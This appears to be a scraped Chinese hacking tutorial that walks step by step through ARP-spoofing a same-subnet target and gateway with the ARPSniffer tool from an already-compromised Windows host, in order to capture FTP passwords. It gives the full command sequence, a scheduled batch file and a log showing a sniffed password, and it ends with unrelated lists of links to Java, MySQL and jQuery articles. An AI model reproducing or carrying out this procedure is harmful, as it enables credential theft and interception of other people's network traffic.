假设想攻击的主机IP是:61.139.1.79
同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆
 
第一步:
tracert 61.139.1.1
 
C:\WIN2000\system32>tracert 61.139.1.1
 
Tracing route to HACK-4FJ7EARC [61.139.1.1]
over a maximum of 30 hops:
 
  1   <10 ms   <10 ms   <10 ms  HACK-4FJ7EARC [61.139.1.1]
 
Trace complete.
 
这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能
进行ARPSNIFFER了
 
第二步:看本机IP设置和网卡情况
C:\WIN2000\system32>ipconfig /all
 
Windows 2000 IP Configuration
 
        Host Name . . . . . . . . . . . . : smscomputer
        Primary DNS Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Broadcast
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
 
Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:
 
        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection
        Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6
        DHCP Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 61.139.1.2
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 61.139.1.65
        DNS Servers . . . . . . . . . . . : 61.139.1.73
 
说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地
方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0
的话也只能嗅探到通过自已的数据哟.
从上面我们还可以知道网关是61.139.1.65
 
第三步:查看本机时间
C:\WIN2000\system32>net time \\127.0.0.1
 
\\127.0.0.1 的当前时间是 2003/1/28 下午 09:13
 
命令完成成功
 
要注意的是这儿的时间是12小时式,用at命令应要24小时式
 
第四步:编写启动ARPsniffer的bat文件
C:\WIN2000\system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:\winnt\a.bat
 
注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com 
 
Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter
Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)
 
Usage: ArpSniffer <IP1> <IP2> <Sniffer TCP Port> <LogFile> <NetAdp> [/RESET]
 
第五步:后台运行开始嗅探咯
C:\winnt\system32>at \\127.0.0.1 20:44 c:\winnt\a.bat
 
注意:这儿的时间要用24小时式
     arpsniffer最好拷到system32目录下,记录文件也会生成在这儿
     执行完第四步要先安装WINPCAP 2.1驱动
     同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子
 
第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉
以SYSTEM权限启动的ARPSniffer程序
C:\winnt\system32>pulist
...................
conime.exe        248  NT AUTHORITY\SYSTEM
explorer.exe      1864 SMSCOMPUTER\Administrator
CSRSS.EXE         2256 NT AUTHORITY\SYSTEM
Arpsniffer.exe    2322 NT AUTHORITY\SYSTEM       ----就是它了!
WINLOGON.EXE      2344 NT AUTHORITY\SYSTEM
......................
 
杀了它
C:\winnt\system32>pskill 2322
PsKill v1.03 - local and remote process killer
Copyright (C) 2000 Mark Russinovich
http://www.sysinternals.com 
 
Process 2322 killed.
 
C:\winnt\system32>type 1.txt       我的例子中嗅探的是FTP密码:)
 
...............
61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.188.218.179(1404)->61.139.1.79(21)QUIT
61.139.1.79(21)->61.188.218.179(1404)221
61.139.1.79(21)->61.188.218.179(1404)221
............
............
 
特别要注意的就是PASS哈:)
 
付录:
前台正常执行的显示
 
C:\>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset
 
ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB
www.netXeyes.com 2002, security@vip.sina.com 
 
Network Adapter 0: Intel(R) 8255x Based Network Connection
 
Enable IP Router....OK
 
Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02
Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb
Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6
 
Spoof 61.139.1.79: Mac of 61.139.1.65 ===> Mac of 61.139.1.88
Spoof 61.139.1.65: Mac of 61.139.1.79 ===> Mac of 61.139.1.88
有时这儿要先显示can not open driver(0)不管它等一下就可以了
Begin Sniffer.........

C段渗透攻击必看的技术知识的更多相关文章

  1. Java 必看的 Spring 知识汇总!有比这更全的算我输!

    往 期 精 彩 推 荐    [1]Java Web技术经验总结 [2]15个顶级Java多线程面试题及答案,快来看看吧 [3]面试官最喜欢问的十道java面试题 [4]从零讲JAVA ,给你一条清晰 ...

  2. Java 必看的 Spring 知识汇总

    Spring框架是由于软件开发的复杂性而创建的.Spring使用的是基本的JavaBean来完成以前只可能由EJB完成的事情.然而,Spring的用途不仅仅限于服务器端的开发.从简单性.可测试性和松耦 ...

  3. Mysql数据库优化技术之配置篇、索引篇 ( 必看 必看 转)

    转自:Mysql数据库优化技术之配置篇.索引篇 ( 必看 必看 ) (一)减少数据库访问对于可以静态化的页面,尽可能静态化对一个动态页面中可以静态的局部,采用静态化部分数据可以生成XML,或者文本文件 ...

  4. 我花了2个月时间,整理了100篇Linux技术精华,技术人必看

    一个以技术为立身根基的教育机构做出来的微信号,干货程度会有多高? 马哥Linux运维公众号运营五年,从一开始的定位就是给技术人分享加薪干货的地方.这五年里,公众号运营最重的任务就是做内容.内容并不好做 ...

  5. 20145329 《网络对抗技术》客户端Adobe阅读器渗透攻击

    两台虚拟机: kali ip:192.168.96.130 windows xp sp3 ip:192.168.96.133 1.kali下打开显示隐藏文件 2.在kali终端中开启msfconsol ...

  6. java 学习写架构必会几大技术点

    java 学习写架构必会几大技术点 关于学习架构,必须会的几点技术 1. java反射技术 2. xml文件处理 3. properties属性文件处理 4. 线程安全机制 5. annocation ...

  7. iOS10推送必看UNNotificationServiceExtension

    转:http://www.cocoachina.com/ios/20161017/17769.html (收录供个人学习用) iOS10推送UNNotificationServic 招聘信息: 产品经 ...

  8. 第三方插件渗透攻击之KingView

    类别:堆溢出 描述:本次渗透利用了KingView6.5.3 SCADA中的ActiveX插件中存在漏洞的方法调用target.ValidateUser(arg1, arg2),通过缓冲区溢出覆盖了S ...

  9. Linux驱动开发必看详解神秘内核(完全转载)

    Linux驱动开发必看详解神秘内核 完全转载-链接:http://blog.chinaunix.net/uid-21356596-id-1827434.html   IT168 技术文档]在开始步入L ...

随机推荐

  1. jquery的css详解(一)

    通过阅读源码可以发现css是jq的实例方法.而在内部调用jq的工具方法access来实现的,对该方法不了解的朋友请点击 -> jquery工具方法access详解 在access的回调中做了一个 ...

  2. Recover data from reference electrode via EEGLab 用EEGLab恢复参考电极数据

    The data of scanning reference electrode will not show initially. Here is a summary of recovering it ...

  3. VS 报cmath(19): error C2061: 语法错误: 标识符“acosf” 错误

    这是因为我在.c文件中用了 #include <iostream> using namespace std; 这样编译的时候就报: 出现错误类型如下:1>c:\program fil ...

  4. EventToCommand

    EventToCommand 在WPF中,并不是所有控件都有Command,例如TextBox,那么当文本改变,我们需要处理一些逻辑,这些逻辑在ViewModel 中,没有Command如何绑定呢?这 ...

  5. PHP7中php.ini、php-fpm和www.conf的配置

    引自:https://typecodes.com/web/php7configure.html 1 配置php.ini php.ini是php运行核心配置文件: ######避免PHP信息暴露在htt ...

  6. js base64加密,后台解密

    这是为了解决页面发送post请求,传输密码,在页面的控制台可以看到密码的明文,所以先用base64把要传输的密码转换为非明文,然后在后台解密处理. base64encode.js // base64加 ...

  7. Thinking in java学习笔记之interface

    (完全解耦)策略设计模式:

  8. hadoop在网页客户端的maven配置

    hadoop网页客户端maven配置,只能在tomcat7上运行,tomcat6和tomcat8运行会出错,我用的是tomcat-7.0.67 完整的pom.xml内容为: <!-- 这个配置只 ...

  9. Finite State Machine 是什么?

    状态机(Finite State Machine):状态机由状态寄存器和组合逻辑电路构成,能够根据控制信号按照预先设定的状态进行状态转移,是协调相关信号动       作.完成特定操作的控制中心. 类 ...

  10. 没有为 COM 互操作注册程序集 请使用 regasm.exe /tlb 注册该程序集——解决办法

    错误现象: 错误 6 没有为 COM 互操作注册程序集“DevExpress.Utils.v13.1, Version=13.1.7.0, Culture=neutral, PublicKeyToke ...